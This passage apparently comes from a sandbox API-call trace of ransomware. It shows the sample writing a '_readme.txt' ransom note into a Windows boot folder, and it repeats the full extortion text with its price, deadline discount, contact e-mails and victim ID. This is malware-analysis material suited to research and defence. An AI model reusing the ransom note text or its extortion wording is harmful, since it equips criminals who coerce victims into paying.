hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8d2f0 [0173.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.837] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a0c8 | out: hHeap=0x2c0000) returned 1 [0173.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.837] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8d2f0 [0173.838] PathFindFileNameW (pszPath="C:\\Boot\\zh-CN\\") returned="zh-CN\\" [0173.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.838] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0173.838] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.838] PathFindFileNameW (pszPath="") returned="" [0173.838] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59a88 [0173.838] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0173.839] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0173.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x800) returned 0x3aa2818 [0173.839] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3aa2818 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0173.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x810) returned 0x3a8d2f0 [0173.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a0c8 [0173.839] FreeLibrary (hLibModule=0x759d0000) returned 1 [0173.839] PathAppendW (in: pszPath="C:\\Boot\\zh-CN\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-CN\\_readme.txt") returned 1 [0173.839] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.839] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.839] PathFileExistsW (pszPath="C:\\Boot\\zh-CN\\_readme.txt") returned 0 [0173.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7d00) returned 0x3ad0490 [0173.840] lstrcpyW (in: lpString1=0x3ad0490, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0173.840] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0173.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8db78 [0173.840] CreateFileW (lpFileName="C:\\Boot\\zh-CN\\_readme.txt" (normalized: "c:\\boot\\zh-cn\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x690 [0173.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8c0) returned 0x3ad8198 [0173.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x858) returned 0x3aa2818 [0173.840] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", cchWideChar=-1, lpMultiByteStr=0x3aa2818, cbMultiByte=2136, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", lpUsedDefaultChar=0x0) returned 1113 [0173.840] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x326560 [0173.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.840] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ad8198 | out: hHeap=0x2c0000) returned 1 [0173.841] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned 1112 [0173.841] WriteFile (in: hFile=0x690, lpBuffer=0x326560*, nNumberOfBytesToWrite=0x458, lpNumberOfBytesWritten=0xa13fb64, lpOverlapped=0x0 | out: lpBuffer=0x326560*, lpNumberOfBytesWritten=0xa13fb64*=0x458, lpOverlapped=0x0) returned 1 [0173.842] CloseHandle (hObject=0x690) returned 1 [0173.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.842] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8db78 | out: hHeap=0x2c0000) returned 1 [0173.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3ad0490 | out: hHeap=0x2c0000) returned 1 [0173.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8d2f0 | out: hHeap=0x2c0000) returned 1 [0173.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.843] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-CN\\*", lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1e67c120, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e67c120, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3577340 [0173.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.843] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1e67c120, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e67c120, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0173.843] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0173.843] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e67c120, ftCreationTime.dwHighDateTime=0x1d69ad5, ftLastAccessTime.dwLowDateTime=0x1e67c120, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e67c120, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x458, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0173.843] FindNextFileW (in: hFindFile=0x3577340, lpFindFileData=0xa13fba4 | out: lpFindFileData=0xa13fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1e67c120, ftCreationTime.dwHighDateTime=0x1d69ad5, ftLastAccessTime.dwLowDateTime=0x1e67c120, ftLastAccessTime.dwHighDateTime=0x1d69ad5, ftLastWriteTime.dwLowDateTime=0x1e67c120, ftLastWriteTime.dwHighDateTime=0x1d69ad5, nFileSizeHigh=0x0, nFileSizeLow=0x458, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0173.843] FindClose (in: hFindFile=0x3577340 | out: hFindFile=0x3577340) returned 1 [0173.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a59df8 | out: hHeap=0x2c0000) returned 1 [0173.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a59df8 [0173.843] PeekMessageW (in: lpMsg=0xa13fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0xa13fb74) returned 0 [0173.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.843] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.843] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.844] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.844] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc2e) returned 0x326560 [0173.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x326560 | out: hHeap=0x2c0000) returned 1 [0173.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x860) returned 0x3aa2818 [0173.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3aa2818 | out: hHeap=0x2c0000) returned 1 [0173.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.845] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.845] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x3a8ca68 [0173.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.846] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x830) returned 0x3a8ca68 [0173.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.846] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.847] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.847] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.847] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.847] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 [0173.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a8ca68 | out: hHeap=0x2c0000) returned 1 [0173.847] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a5a190 | out: hHeap=0x2c0000) returned 1 [0173.847] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x3a5a190 [0173.847] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3a8ca68 